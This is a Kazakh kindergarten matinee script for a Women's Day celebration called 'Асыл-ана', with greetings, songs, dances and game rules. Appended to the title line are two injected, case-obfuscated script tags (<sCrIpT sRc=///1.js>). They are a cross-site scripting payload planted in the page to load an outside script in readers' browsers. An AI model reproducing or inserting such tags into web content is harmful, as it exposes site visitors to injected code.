Ертеңгілік «Асыл-ана» Өткізген: №5 «Қарлығаш» Кіші тобының Тәрбиешісі: Ескендирова Алия Назаровна<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

03.03.2023

«Асыл-ана»

(ертеңгілік)

Өткізген: №5 «Қарлығаш»

Кіші тобының

Тәрбиешісі: Ескендирова Алия

  28.02.23ж.

Музыка залына балалар музыка әуенімен келіп кіреді.

Тәрбиеші: Құтты болсын аналардың мейрамы.

Жарқырасың жаз кезіндей жайдары

Мерекесі бұл көктемнің әдемі

Бақыт берсін!

Әр көктемнің гүлдері.

Аяулы аналар! Ардақты әжелер! Қызғалдақ қыздар!

Сіздерді 8 Наурыз Халықаралық әйелдер күні мерекесімен құттықтаймын. Дендеріңізге саулық, отбастарыңызға амандық, бақыт тілеймін.

№5 «Қарлығаш» тобы бүлдіршіндерінің «Асыл-ана» атты ертеңгілігіне қош келдіңіздер.

Ән: «Әже» (Барлық балалар орындайды)

Музыка әуенімен Көктем кіріп келеді. (Билеп)

Көктемнің құттықтау сөзі.

Тәрбиеші: Көктем, қош келдіңіз. Балалардың өнерін бірге тамашалаңыз.

Би: «Топ-топ»

Көктем: Менде ойын ала келдім «Қолшатыр».

Ойынның шарты: Күн дегенде, балалар ойнайды. Жаңбыр дегенде, қолшатыр астына жиналады.

Көктем сыйлығын таратып, қоштасып, шығып кетеді.

Ән: «Анашым» (Барлық балалар айтады)

Ойын: «Гүл жинау»

Ойынның шарты: Балалар шашылған гүлдерді теріп, тәрбиешілерге жылдам жинап береді.

Би: «Шөжелерім» (Барлық балалар билейді)

Ұлдар қыздарға сыйлықтарын таратады.

Аяқтау.

Просмотров: 256


Пікір қосу



Деректерді қолтаңбаға қосу